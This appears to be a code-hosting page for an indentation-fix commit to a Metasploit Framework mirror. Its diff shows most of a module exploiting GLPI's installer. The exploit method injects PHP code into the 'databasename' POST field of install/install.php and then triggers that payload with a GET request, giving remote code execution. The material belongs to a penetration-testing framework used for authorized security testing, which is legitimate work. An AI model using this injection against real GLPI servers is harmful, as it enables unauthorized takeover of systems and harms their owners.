infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

corrected indentation bug

bug/bundler_fix
dummys 2013-09-19 20:14:07 +02:00
parent f9617e351d
commit ce8e94b5fe
1 changed files with 28 additions and 28 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

56
modules/exploits/multi/php/glpi_install_rce.rb
View File

@ -45,15 +45,15 @@ class Metasploit3 < Msf::Exploit::Remote
], self.class)
end
def check
def check
# Check if the GLPI instance is vulnerable
uri = target_uri.path
uri << '/' if uri[-1,1] != '/'
uri = target_uri.path
uri << '/' if uri[-1,1] != '/'
res = send_request_cgi({
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'index.php'),
})
})
if res and res.code == 200
re='(version)(\\s+)(.*)(\\s+)(Copyright)'
@ -80,29 +80,29 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
uri = target_uri.path
rand_arg = Rex::Text.rand_text_hex(10)
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'install/install.php'),
'vars_post' =>
{
'install'=>'update_1',
'db_host'=>'localhost',
'db_user'=>'root',
'db_pass'=>'root',
'databasename'=>"'; } if(isset($_GET['#{rand_arg}'])){ #{payload.encoded} } /*"
}
})
uri = target_uri.path
rand_arg = Rex::Text.rand_text_hex(10)
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'install/install.php'),
'vars_post' =>
{
'install'=>'update_1',
'db_host'=>'localhost',
'db_user'=>'root',
'db_pass'=>'root',
'databasename'=>"'; } if(isset($_GET['#{rand_arg}'])){ #{payload.encoded} } /*"
}
})
send_request_cgi(
opts={
'method' => 'GET',
'uri' => normalize_uri(uri, 'index.php'),
'vars_get' =>
{
rand_arg => '1',
}
})
send_request_cgi(
opts={
'method' => 'GET',
'uri' => normalize_uri(uri, 'index.php'),
'vars_get' =>
{
rand_arg => '1',
}
})
end
end